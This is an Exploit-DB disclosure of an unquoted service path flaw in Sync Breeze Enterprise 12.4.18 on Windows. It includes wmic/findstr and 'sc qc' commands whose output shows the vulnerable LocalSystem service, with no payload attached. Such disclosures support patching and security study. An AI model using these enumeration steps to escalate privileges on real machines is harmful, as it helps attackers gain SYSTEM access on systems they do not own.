Sync Breeze Enterprise 12.4.18 - 'Sync Breeze Enterprise' Unquoted Service Path

EDB-ID:

48045

CVE:

N/A


Author:

boku

Type:

local


Platform:

Windows

Date:

2020-02-11


Become a Certified Penetration Tester

Enroll in Penetration Testing with Kali Linux and pass the exam to become an Offensive Security Certified Professional (OSCP). All new content for 2020.

GET CERTIFIED

Exploit Title: Sync Breeze Enterprise 12.4.18 - 'Sync Breeze Enterprise' Unquoted Service Path
Exploit Author: boku
Date: 2020-02-10
Vendor Homepage: http://www.syncbreeze.com
Software Link: http://www.syncbreeze.com/setups/syncbreezeent_setup_v12.4.18.exe
Version: 12.4.18
Tested On: Windows 10 (32-bit)

C:\Users\elaglor>wmic service get name, pathname, startmode | findstr /i "auto" | findstr /i /v "C:\Windows\\" | findstr /i /v """
Sync Breeze Enterprise          C:\Program Files\Sync Breeze Enterprise\bin\syncbrs.exe             Auto

C:\Users\elaglor>sc qc "Sync Breeze Enterprise"
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: Sync Breeze Enterprise
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 0   IGNORE
        BINARY_PATH_NAME   : C:\Program Files\Sync Breeze Enterprise\bin\syncbrs.exe
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : Sync Breeze Enterprise
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem